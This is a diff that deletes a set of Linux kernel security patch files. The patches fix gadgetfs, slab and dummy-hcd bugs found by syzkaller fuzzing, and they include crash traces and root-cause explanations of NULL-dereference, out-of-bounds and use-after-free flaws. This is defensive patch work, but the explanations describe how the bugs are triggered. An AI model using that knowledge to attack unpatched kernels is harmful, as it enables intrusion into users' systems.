+++ /dev/null
@@ -1,89 +0,0 @@
-From f50b878fed33e360d01dcdc31a8eeb1815d033d5 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Thu, 8 Jun 2017 13:55:59 -0400
-Subject: [PATCH] USB: gadget: fix GPF in gadgetfs
-
-A NULL-pointer dereference bug in gadgetfs was uncovered by syzkaller:
-
-> kasan: GPF could be caused by NULL-ptr deref or user memory access
-> general protection fault: 0000 [#1] SMP KASAN
-> Dumping ftrace buffer:
-> (ftrace buffer empty)
-> Modules linked in:
-> CPU: 2 PID: 4820 Comm: syz-executor0 Not tainted 4.12.0-rc4+ #5
-> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-> task: ffff880039542dc0 task.stack: ffff88003bdd0000
-> RIP: 0010:__list_del_entry_valid+0x7e/0x170 lib/list_debug.c:51
-> RSP: 0018:ffff88003bdd6e50 EFLAGS: 00010246
-> RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000010000
-> RDX: 0000000000000000 RSI: ffffffff86504948 RDI: ffffffff86504950
-> RBP: ffff88003bdd6e68 R08: ffff880039542dc0 R09: ffffffff8778ce00
-> R10: ffff88003bdd6e68 R11: dffffc0000000000 R12: 0000000000000000
-> R13: dffffc0000000000 R14: 1ffff100077badd2 R15: ffffffff864d2e40
-> FS: 0000000000000000(0000) GS:ffff88006dc00000(0000) knlGS:0000000000000000
-> CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-> CR2: 000000002014aff9 CR3: 0000000006022000 CR4: 00000000000006e0
-> Call Trace:
-> __list_del_entry include/linux/list.h:116 [inline]
-> list_del include/linux/list.h:124 [inline]
-> usb_gadget_unregister_driver+0x166/0x4c0 drivers/usb/gadget/udc/core.c:1387
-> dev_release+0x80/0x160 drivers/usb/gadget/legacy/inode.c:1187
-> __fput+0x332/0x7f0 fs/file_table.c:209
-> ____fput+0x15/0x20 fs/file_table.c:245
-> task_work_run+0x19b/0x270 kernel/task_work.c:116
-> exit_task_work include/linux/task_work.h:21 [inline]
-> do_exit+0x18a3/0x2820 kernel/exit.c:878
-> do_group_exit+0x149/0x420 kernel/exit.c:982
-> get_signal+0x77f/0x1780 kernel/signal.c:2318
-> do_signal+0xd2/0x2130 arch/x86/kernel/signal.c:808
-> exit_to_usermode_loop+0x1a7/0x240 arch/x86/entry/common.c:157
-> prepare_exit_to_usermode arch/x86/entry/common.c:194 [inline]
-> syscall_return_slowpath+0x3ba/0x410 arch/x86/entry/common.c:263
-> entry_SYSCALL_64_fastpath+0xbc/0xbe
-> RIP: 0033:0x4461f9
-> RSP: 002b:00007fdac2b1ecf8 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca
-> RAX: fffffffffffffe00 RBX: 00000000007080c8 RCX: 00000000004461f9
-> RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000007080c8
-> RBP: 00000000007080a8 R08: 0000000000000000 R09: 0000000000000000
-> R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
-> R13: 0000000000000000 R14: 00007fdac2b1f9c0 R15: 00007fdac2b1f700
-> Code: 00 00 00 00 ad de 49 39 c4 74 6a 48 b8 00 02 00 00 00 00 ad de
-> 48 89 da 48 39 c3 74 74 48 c1 ea 03 48 b8 00 00 00 00 00 fc ff df <80>
-> 3c 02 00 0f 85 92 00 00 00 48 8b 13 48 39 f2 75 66 49 8d 7c
-> RIP: __list_del_entry_valid+0x7e/0x170 lib/list_debug.c:51 RSP: ffff88003bdd6e50
-> ---[ end trace 30e94b1eec4831c8 ]---
-> Kernel panic - not syncing: Fatal exception
-
-The bug was caused by dev_release() failing to turn off its
-gadget_registered flag after unregistering the gadget driver. As a
-result, when a later user closed the device file before writing a
-valid set of descriptors, dev_release() thought the gadget had been
-registered and tried to unregister it, even though it had not been.
-This led to the NULL pointer dereference.
-
-The fix is simple: turn off the flag when the gadget is unregistered.
-
-Signed-off-by: Alan Stern
-Reported-and-tested-by: Andrey Konovalov
-CC:
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/legacy/inode.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index b9ca0a26cbd93..5ffd879f78868 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1183,8 +1183,10 @@ dev_release (struct inode *inode, struct file *fd)
-
- /* closing ep0 === shutdown all */
-
-- if (dev->gadget_registered)
-+ if (dev->gadget_registered) {
- usb_gadget_unregister_driver (&gadgetfs_driver);
-+ dev->gadget_registered = false;
-+ }
-
- /* at this point "good" hardware has disconnected the
- * device from USB; the host won't see it any more.
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch
deleted file mode 100644
index 674ca7fa..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From bb1107f7c6052c863692a41f78c000db792334bf Mon Sep 17 00:00:00 2001
-From: Michal Hocko
-Date: Tue, 10 Jan 2017 16:57:27 -0800
-Subject: [PATCH] mm, slab: make sure that KMALLOC_MAX_SIZE will fit into
- MAX_ORDER
-
-Andrey Konovalov has reported the following warning triggered by the
-syzkaller fuzzer.
-
- WARNING: CPU: 1 PID: 9935 at mm/page_alloc.c:3511 __alloc_pages_nodemask+0x159c/0x1e20
- Kernel panic - not syncing: panic_on_warn set ...
- CPU: 1 PID: 9935 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #34
- Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- Call Trace:
- __alloc_pages_slowpath mm/page_alloc.c:3511
- __alloc_pages_nodemask+0x159c/0x1e20 mm/page_alloc.c:3781
- alloc_pages_current+0x1c7/0x6b0 mm/mempolicy.c:2072
- alloc_pages include/linux/gfp.h:469
- kmalloc_order+0x1f/0x70 mm/slab_common.c:1015
- kmalloc_order_trace+0x1f/0x160 mm/slab_common.c:1026
- kmalloc_large include/linux/slab.h:422
- __kmalloc+0x210/0x2d0 mm/slub.c:3723
- kmalloc include/linux/slab.h:495
- ep_write_iter+0x167/0xb50 drivers/usb/gadget/legacy/inode.c:664
- new_sync_write fs/read_write.c:499
- __vfs_write+0x483/0x760 fs/read_write.c:512
- vfs_write+0x170/0x4e0 fs/read_write.c:560
- SYSC_write fs/read_write.c:607
- SyS_write+0xfb/0x230 fs/read_write.c:599
- entry_SYSCALL_64_fastpath+0x1f/0xc2
-
-The issue is caused by a lack of size check for the request size in
-ep_write_iter which should be fixed. It, however, points to another
-problem, that SLUB defines KMALLOC_MAX_SIZE too large because the its
-KMALLOC_SHIFT_MAX is (MAX_ORDER + PAGE_SHIFT) which means that the
-resulting page allocator request might be MAX_ORDER which is too large
-(see __alloc_pages_slowpath).
-
-The same applies to the SLOB allocator which allows even larger sizes.
-Make sure that they are capped properly and never request more than
-MAX_ORDER order.
-
-Link: http://lkml.kernel.org/r/20161220130659.16461-2-mhocko@kernel.org
-Signed-off-by: Michal Hocko
-Reported-by: Andrey Konovalov
-Acked-by: Christoph Lameter
-Cc: Alexei Starovoitov
-Signed-off-by: Andrew Morton
-Signed-off-by: Linus Torvalds
----
- include/linux/slab.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/slab.h b/include/linux/slab.h
-index 084b12bad1982..4c53635668154 100644
---- a/include/linux/slab.h
-+++ b/include/linux/slab.h
-@@ -226,7 +226,7 @@ static inline const char *__check_heap_object(const void *ptr,
- * (PAGE_SIZE*2). Larger requests are passed to the page allocator.
- */
- #define KMALLOC_SHIFT_HIGH (PAGE_SHIFT + 1)
--#define KMALLOC_SHIFT_MAX (MAX_ORDER + PAGE_SHIFT)
-+#define KMALLOC_SHIFT_MAX (MAX_ORDER + PAGE_SHIFT - 1)
- #ifndef KMALLOC_SHIFT_LOW
- #define KMALLOC_SHIFT_LOW 3
- #endif
-@@ -239,7 +239,7 @@ static inline const char *__check_heap_object(const void *ptr,
- * be allocated from the same page.
- */
- #define KMALLOC_SHIFT_HIGH PAGE_SHIFT
--#define KMALLOC_SHIFT_MAX 30
-+#define KMALLOC_SHIFT_MAX (MAX_ORDER + PAGE_SHIFT - 1)
- #ifndef KMALLOC_SHIFT_LOW
- #define KMALLOC_SHIFT_LOW 3
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch
deleted file mode 100644
index e704bf63..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0007.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From faab50984fe6636e616c7cc3d30308ba391d36fd Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Fri, 9 Dec 2016 15:17:46 -0500
-Subject: [PATCH] USB: gadgetfs: fix unbounded memory allocation bug
-
-Andrey Konovalov reports that fuzz testing with syzkaller causes a
-KASAN warning in gadgetfs:
-
-BUG: KASAN: slab-out-of-bounds in dev_config+0x86f/0x1190 at addr ffff88003c47e160
-Write of size 65537 by task syz-executor0/6356
-CPU: 3 PID: 6356 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #19
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88003c107ad8 ffffffff81f96aba ffffffff3dc11ef0 1ffff10007820eee
- ffffed0007820ee6 ffff88003dc11f00 0000000041b58ab3 ffffffff8598b4c8
- ffffffff81f96828 ffffffff813fb4a0 ffff88003b6eadc0 ffff88003c107738
-Call Trace:
- [< inline >] __dump_stack lib/dump_stack.c:15
- [] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:159
- [< inline >] print_address_description mm/kasan/report.c:197
- [] kasan_report_error+0x1f0/0x4e0 mm/kasan/report.c:286
- [] kasan_report+0x35/0x40 mm/kasan/report.c:306
- [< inline >] check_memory_region_inline mm/kasan/kasan.c:308
- [] check_memory_region+0x139/0x190 mm/kasan/kasan.c:315
- [] kasan_check_write+0x14/0x20 mm/kasan/kasan.c:326
- [< inline >] copy_from_user arch/x86/include/asm/uaccess.h:689
- [< inline >] ep0_write drivers/usb/gadget/legacy/inode.c:1135
- [] dev_config+0x86f/0x1190 drivers/usb/gadget/legacy/inode.c:1759
- [] __vfs_write+0x5d5/0x760 fs/read_write.c:510
- [] vfs_write+0x170/0x4e0 fs/read_write.c:560
- [< inline >] SYSC_write fs/read_write.c:607
- [] SyS_write+0xfb/0x230 fs/read_write.c:599
- [] entry_SYSCALL_64_fastpath+0x1f/0xc2
-
-Indeed, there is a comment saying that the value of len is restricted
-to a 16-bit integer, but the code doesn't actually do this.
-
-This patch fixes the warning. It replaces the comment with a
-computation that forces the amount of data copied from the user in
-ep0_write() to be no larger than the wLength size for the control
-transfer, which is a 16-bit quantity.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-CC:
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/legacy/inode.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 48f1409b438ad..01ed3bc0c3c8e 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1126,7 +1126,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- /* data and/or status stage for control request */
- } else if (dev->state == STATE_DEV_SETUP) {
-
-- /* IN DATA+STATUS caller makes len <= wLength */
-+ len = min_t(size_t, len, dev->setup_wLength);
- if (dev->setup_in) {
- retval = setup_req (dev->gadget->ep0, dev->req, len);
- if (retval == 0) {
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch
deleted file mode 100644
index 09a35d55..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0008.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From bcdbeb844773333d2d1c08004f3b3e25921040e5 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Wed, 14 Dec 2016 14:55:56 -0500
-Subject: [PATCH] USB: dummy-hcd: fix bug in stop_activity (handle ep0)
-
-The stop_activity() routine in dummy-hcd is supposed to unlink all
-active requests for every endpoint, among other things. But it
-doesn't handle ep0. As a result, fuzz testing can generate a WARNING
-like the following:
-
-WARNING: CPU: 0 PID: 4410 at drivers/usb/gadget/udc/dummy_hcd.c:672 dummy_free_request+0x153/0x170
-Modules linked in:
-CPU: 0 PID: 4410 Comm: syz-executor Not tainted 4.9.0-rc7+ #32
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88006a64ed10 ffffffff81f96b8a ffffffff41b58ab3 1ffff1000d4c9d35
- ffffed000d4c9d2d ffff880065f8ac00 0000000041b58ab3 ffffffff8598b510
- ffffffff81f968f8 0000000041b58ab3 ffffffff859410e0 ffffffff813f0590
-Call Trace:
- [< inline >] __dump_stack lib/dump_stack.c:15
- [] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [] __warn+0x19f/0x1e0 kernel/panic.c:550
- [] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
- [] dummy_free_request+0x153/0x170 drivers/usb/gadget/udc/dummy_hcd.c:672
- [] usb_ep_free_request+0xc0/0x420 drivers/usb/gadget/udc/core.c:195
- [] gadgetfs_unbind+0x131/0x190 drivers/usb/gadget/legacy/inode.c:1612
- [] usb_gadget_remove_driver+0x10f/0x2b0 drivers/usb/gadget/udc/core.c:1228
- [] usb_gadget_unregister_driver+0x154/0x240 drivers/usb/gadget/udc/core.c:1357
-
-This patch fixes the problem by iterating over all the endpoints in
-the driver's ep array instead of iterating over the gadget's ep_list,
-which explicitly leaves out ep0.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-CC:
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/udc/dummy_hcd.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c
-index 02b14e91ae6c5..c60abe3a68f9c 100644
---- a/drivers/usb/gadget/udc/dummy_hcd.c
-+++ b/drivers/usb/gadget/udc/dummy_hcd.c
-@@ -330,7 +330,7 @@ static void nuke(struct dummy *dum, struct dummy_ep *ep)
- /* caller must hold lock */
- static void stop_activity(struct dummy *dum)
- {
-- struct dummy_ep *ep;
-+ int i;
-
- /* prevent any more requests */
- dum->address = 0;
-@@ -338,8 +338,8 @@ static void stop_activity(struct dummy *dum)
- /* The timer is left running so that outstanding URBs can fail */
-
- /* nuke any pending requests first, so driver i/o is quiesced */
-- list_for_each_entry(ep, &dum->gadget.ep_list, ep.ep_list)
-- nuke(dum, ep);
-+ for (i = 0; i < DUMMY_ENDPOINTS; ++i)
-+ nuke(dum, &dum->ep[i]);
-
- /* driver now does any non-usb quiescing necessary */
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch
deleted file mode 100644
index e4477260..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0009.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From 1c069b057dcf64fada952eaa868d35f02bb0cfc2 Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Fri, 9 Dec 2016 15:24:24 -0500
-Subject: [PATCH] USB: gadgetfs: fix checks of wTotalLength in config
- descriptors
-
-Andrey Konovalov's fuzz testing of gadgetfs showed that we should
-improve the driver's checks for valid configuration descriptors passed
-in by the user. In particular, the driver needs to verify that the
-wTotalLength value in the descriptor is not too short (smaller
-than USB_DT_CONFIG_SIZE). And the check for whether wTotalLength is
-too large has to be changed, because the driver assumes there is
-always enough room remaining in the buffer to hold a device descriptor
-(at least USB_DT_DEVICE_SIZE bytes).
-
-This patch adds the additional check and fixes the existing check. It
-may do a little more than strictly necessary, but one extra check
-won't hurt.
-
-Signed-off-by: Alan Stern
-CC: Andrey Konovalov
-CC:
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/legacy/inode.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index f1ca339426073..08e5ecc050795 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1734,10 +1734,12 @@ static struct usb_gadget_driver gadgetfs_driver = {
- * such as configuration notifications.
- */
-
--static int is_valid_config (struct usb_config_descriptor *config)
-+static int is_valid_config(struct usb_config_descriptor *config,
-+ unsigned int total)
- {
- return config->bDescriptorType == USB_DT_CONFIG
- && config->bLength == USB_DT_CONFIG_SIZE
-+ && total >= USB_DT_CONFIG_SIZE
- && config->bConfigurationValue != 0
- && (config->bmAttributes & USB_CONFIG_ATT_ONE) != 0
- && (config->bmAttributes & USB_CONFIG_ATT_WAKEUP) == 0;
-@@ -1787,7 +1789,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- /* full or low speed config */
- dev->config = (void *) kbuf;
- total = le16_to_cpu(dev->config->wTotalLength);
-- if (!is_valid_config (dev->config) || total >= length)
-+ if (!is_valid_config(dev->config, total) ||
-+ total > length - USB_DT_DEVICE_SIZE)
- goto fail;
- kbuf += total;
- length -= total;
-@@ -1796,7 +1799,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- if (kbuf [1] == USB_DT_CONFIG) {
- dev->hs_config = (void *) kbuf;
- total = le16_to_cpu(dev->hs_config->wTotalLength);
-- if (!is_valid_config (dev->hs_config) || total >= length)
-+ if (!is_valid_config(dev->hs_config, total) ||
-+ total > length - USB_DT_DEVICE_SIZE)
- goto fail;
- kbuf += total;
- length -= total;
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch
deleted file mode 100644
index f3962a88..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0010.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From add333a81a16abbd4f106266a2553677a165725f Mon Sep 17 00:00:00 2001
-From: Alan Stern
-Date: Fri, 9 Dec 2016 15:18:43 -0500
-Subject: [PATCH] USB: gadgetfs: fix use-after-free bug
-
-Andrey Konovalov reports that fuzz testing with syzkaller causes a
-KASAN use-after-free bug report in gadgetfs:
-
-BUG: KASAN: use-after-free in gadgetfs_setup+0x208a/0x20e0 at addr ffff88003dfe5bf2
-Read of size 2 by task syz-executor0/22994
-CPU: 3 PID: 22994 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #16
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
- ffff88006df06a18 ffffffff81f96aba ffffffffe0528500 1ffff1000dbe0cd6
- ffffed000dbe0cce ffff88006df068f0 0000000041b58ab3 ffffffff8598b4c8
- ffffffff81f96828 1ffff1000dbe0ccd ffff88006df06708 ffff88006df06748
-Call Trace:
- [ 201.343209] [< inline >] __dump_stack lib/dump_stack.c:15
- [ 201.343209] [] dump_stack+0x292/0x398 lib/dump_stack.c:51
- [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:159
- [< inline >] print_address_description mm/kasan/report.c:197
- [] kasan_report_error+0x1f0/0x4e0 mm/kasan/report.c:286
- [< inline >] kasan_report mm/kasan/report.c:306
- [] __asan_report_load_n_noabort+0x3a/0x40 mm/kasan/report.c:337
- [< inline >] config_buf drivers/usb/gadget/legacy/inode.c:1298
- [] gadgetfs_setup+0x208a/0x20e0 drivers/usb/gadget/legacy/inode.c:1368
- [] dummy_timer+0x11f0/0x36d0 drivers/usb/gadget/udc/dummy_hcd.c:1858
- [] call_timer_fn+0x241/0x800 kernel/time/timer.c:1308
- [< inline >] expire_timers kernel/time/timer.c:1348
- [] __run_timers+0xa06/0xec0 kernel/time/timer.c:1641
- [] run_timer_softirq+0x21/0x80 kernel/time/timer.c:1654
- [] __do_softirq+0x2fb/0xb63 kernel/softirq.c:284
-
-The cause of the bug is subtle. The dev_config() routine gets called
-twice by the fuzzer. The first time, the user data contains both a
-full-speed configuration descriptor and a high-speed config
-descriptor, causing dev->hs_config to be set. But it also contains an
-invalid device descriptor, so the buffer containing the descriptors is
-deallocated and dev_config() returns an error.
-
-The second time dev_config() is called, the user data contains only a
-full-speed config descriptor. But dev->hs_config still has the stale
-pointer remaining from the first call, causing the routine to think
-that there is a valid high-speed config. Later on, when the driver
-dereferences the stale pointer to copy that descriptor, we get a
-use-after-free access.
-
-The fix is simple: Clear dev->hs_config if the passed-in data does not
-contain a high-speed config descriptor.
-
-Signed-off-by: Alan Stern
-Reported-by: Andrey Konovalov
-Tested-by: Andrey Konovalov
-CC:
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/legacy/inode.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 01ed3bc0c3c8e..f1ca339426073 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1800,6 +1800,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- goto fail;
- kbuf += total;
- length -= total;
-+ } else {
-+ dev->hs_config = NULL;
- }
-
- /* could support multiple configs, using another encoding! */
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch
deleted file mode 100644
index 3bc2aaa8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0011.patch
+++ /dev/null
@@ -1,129 +0,0 @@ -From 7b01738112608ce47083178ae2b9ebadf02d32cc Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Felix=20H=C3=A4dicke?= -Date: Thu, 29 Dec 2016 23:02:11 +0100 -Subject: [PATCH] usb: gadget: udc: core: fix return code of - usb_gadget_probe_driver() -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -This fixes a regression which was introduced by commit f1bddbb, by -reverting a small fragment of commit 855ed04. - -If the following conditions were met, usb_gadget_probe_driver() returned -0, although the call was unsuccessful: -1. A particular UDC was specified by thge gadget driver (using member -"udc_name" of struct usb_gadget_driver). -2. The UDC with this name is available. -3. Another gadget driver is already bound to this gadget. -4. The gadget driver has the "match_existing_only" flag set. -In this case, the return code variable "ret" is set to 0, the return -code of a strcmp() call (to check for the second condition). - -This also fixes an oops which could occur in the following scenario: -1. Two usb gadget instances were configured using configfs. -2. The first gadget configuration was bound to a UDC (using the configfs -attribute "UDC"). -3. It was tried to bind the second gadget configuration to the same UDC -in the same way. This operation was then wrongly reported as being -successful. -4. The second gadget configuration's "UDC" attribute is cleared, to -unbind the (not really bound) second gadget configuration from the UDC. 
- -] __list_del_entry+0x29/0xc0 -PGD 41b4c5067 -PUD 41a598067 -PMD 0 - -Oops: 0000 [#1] SMP -Modules linked in: cdc_acm usb_f_fs usb_f_serial -usb_f_acm u_serial libcomposite configfs dummy_hcd bnep intel_rapl -x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm -snd_hda_codec_hdmi irqbypass crct10dif_pclmul crc32_pclmul -ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper -ablk_helper cryptd snd_hda_codec_realtek snd_hda_codec_generic serio_raw -uvcvideo videobuf2_vmalloc btusb snd_usb_audio snd_hda_intel -videobuf2_memops btrtl snd_hda_codec snd_hda_core snd_usbmidi_lib btbcm -videobuf2_v4l2 btintel snd_hwdep videobuf2_core snd_seq_midi bluetooth -snd_seq_midi_event videodev xpad efi_pstore snd_pcm_oss rfkill joydev -media crc16 ff_memless snd_mixer_oss snd_rawmidi nls_ascii snd_pcm -snd_seq snd_seq_device nls_cp437 mei_me snd_timer vfat sg udc_core -lpc_ich fat -efivars mfd_core mei snd soundcore battery nuvoton_cir rc_core evdev -intel_smartconnect ie31200_edac edac_core shpchp tpm_tis tpm_tis_core -tpm parport_pc ppdev lp parport efivarfs autofs4 btrfs xor raid6_pq -hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid uas -usb_storage sr_mod cdrom sd_mod ahci libahci nouveau i915 crc32c_intel -i2c_algo_bit psmouse ttm xhci_pci libata scsi_mod ehci_pci -drm_kms_helper xhci_hcd ehci_hcd r8169 mii usbcore drm nvme nvme_core -fjes button [last unloaded: net2280] -CPU: 5 PID: 829 Comm: bash Not tainted 4.9.0-rc7 #1 -Hardware name: To Be Filled By O.E.M. 
To Be Filled By O.E.M./Z77 -Extreme3, BIOS P1.50 07/11/2013 -task: ffff880419ce4040 task.stack: ffffc90002ed4000 -RIP: 0010:[] [] -__list_del_entry+0x29/0xc0 -RSP: 0018:ffffc90002ed7d68 EFLAGS: 00010207 -RAX: 0000000000000000 RBX: ffff88041787ec30 RCX: dead000000000200 -RDX: 0000000000000000 RSI: ffff880417482002 RDI: ffff88041787ec30 -RBP: ffffc90002ed7d68 R08: 0000000000000000 R09: 0000000000000010 -R10: 0000000000000000 R11: ffff880419ce4040 R12: ffff88041787eb68 -R13: ffff88041787eaa8 R14: ffff88041560a2c0 R15: 0000000000000001 -FS: 00007fe4e49b8700(0000) GS:ffff88042f340000(0000) -knlGS:0000000000000000 -CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -CR2: 0000000000000000 CR3: 000000041b4c4000 CR4: 00000000001406e0 -Stack: -ffffc90002ed7d80 ffffffff94f5e68d ffffffffc0ae5ef0 ffffc90002ed7da0 -ffffffffc0ae22aa ffff88041787e800 ffff88041787e800 ffffc90002ed7dc0 -ffffffffc0d7a727 ffffffff952273fa ffff88041aba5760 ffffc90002ed7df8 -Call Trace: -[] list_del+0xd/0x30 -[] usb_gadget_unregister_driver+0xaa/0xc0 [udc_core] -[] unregister_gadget+0x27/0x60 [libcomposite] -[] ? mutex_lock+0x1a/0x30 -[] gadget_dev_desc_UDC_store+0x88/0xe0 [libcomposite] -[] configfs_write_file+0xa0/0x100 [configfs] -[] __vfs_write+0x37/0x160 -[] ? __fd_install+0x30/0xd0 -[] ? _raw_spin_unlock+0xe/0x10 -[] vfs_write+0xb8/0x1b0 -[] SyS_write+0x58/0xc0 -[] ? 
__close_fd+0x94/0xc0 -[] entry_SYSCALL_64_fastpath+0x1e/0xad -Code: 66 90 55 48 8b 07 48 b9 00 01 00 00 00 00 ad de 48 8b 57 08 48 89 -e5 48 39 c8 74 29 48 b9 00 02 00 00 00 00 ad de 48 39 ca 74 3a <4c> 8b -02 4c 39 c7 75 52 4c 8b 40 08 4c 39 c7 75 66 48 89 50 08 -RIP [] __list_del_entry+0x29/0xc0 -RSP -CR2: 0000000000000000 ----[ end trace 99fc090ab3ff6cbc ]--- - -Fixes: f1bddbb ("usb: gadget: Fix binding to UDC via configfs -interface") -Signed-off-by: Felix Hädicke -Tested-by: Krzysztof Opasiak -Signed-off-by: Felipe Balbi ---- - drivers/usb/gadget/udc/core.c | 6 +++++- - 1 file changed, 5 insertions(+), 1 deletion(-) - -diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c -index 9483489080f66..0402177f93cdd 100644 ---- a/drivers/usb/gadget/udc/core.c -+++ b/drivers/usb/gadget/udc/core.c -@@ -1317,7 +1317,11 @@ int usb_gadget_probe_driver(struct usb_gadget_driver *driver) - if (!ret) - break; - } -- if (!ret && !udc->driver) -+ if (ret) -+ ret = -ENODEV; -+ else if (udc->driver) -+ ret = -EBUSY; -+ else - goto found; - } else { - list_for_each_entry(udc, &udc_list, list) { diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch deleted file mode 100644 index ae0f884b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0012.patch +++ /dev/null 
@@ -1,35 +0,0 @@
-From 0994b0a257557e18ee8f0b7c5f0f73fe2b54eec1 Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman
-Date: Tue, 6 Dec 2016 08:36:29 +0100
-Subject: [PATCH] usb: gadgetfs: restrict upper bound on device configuration
- size
-
-Andrey Konovalov reported that we were not properly checking the upper
-limit before of a device configuration size before calling
-memdup_user(), which could cause some problems.
-
-So set the upper limit to PAGE_SIZE * 4, which should be good enough for
-all devices.
-
-Reported-by: Andrey Konovalov
-Cc: stable
-Signed-off-by: Greg Kroah-Hartman
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/legacy/inode.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index e8f4102d19df5..48f1409b438ad 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1762,7 +1762,8 @@ dev_config (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- }
- spin_unlock_irq(&dev->lock);
-
